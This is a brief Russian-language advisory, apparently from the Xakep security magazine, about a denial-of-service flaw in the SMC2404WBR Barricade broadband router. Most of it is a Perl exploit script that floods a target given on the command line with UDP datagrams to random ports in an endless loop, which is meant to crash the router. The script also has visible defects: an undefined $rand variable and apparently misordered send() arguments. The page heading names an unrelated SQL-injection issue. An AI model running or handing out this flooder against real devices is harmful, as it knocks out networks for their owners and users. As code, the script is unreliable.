Xakep #305. Многошаговые SQL-инъекции
Программа: Barricade Turbo Broadband Router SMC2404WBR
Уязвимость обнаружена в Barricade Turbo Broadband Router SMC2404WBR. Злонамеренный пользователь может вызвать DoS нападение.
Удаленный пользователь может послать множественные UDP датаграммы к случайным портам на устройстве, чтобы аварийно завершить работу маршрутизатора.
Пример/Эксплоит:
#!/usr/bin/perl
use Socket;
system(clear);
if(!defined($ARGV[0]))
{
&usage
}
my ($target);
$target=$ARGV[0];
my $ia = inet_aton($target) || die ("[-] Unable to resolve
$target");
socket(DoS, PF_INET, SOCK_DGRAM, 17);
$iaddr = inet_aton("$target");
print "[*] DoSing $target ... wait 1 minute and then CTRL+C to stop\n";
for (;;) {
$size=$rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x
$rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x
$rand x $rand;
$port=int(rand 65000) +1;
send(DoS, 0, $size, sockaddr_in($port, $iaddr));
}
sub usage {die("\n\n[*] Usage : perl $0 <Target>\n\n");}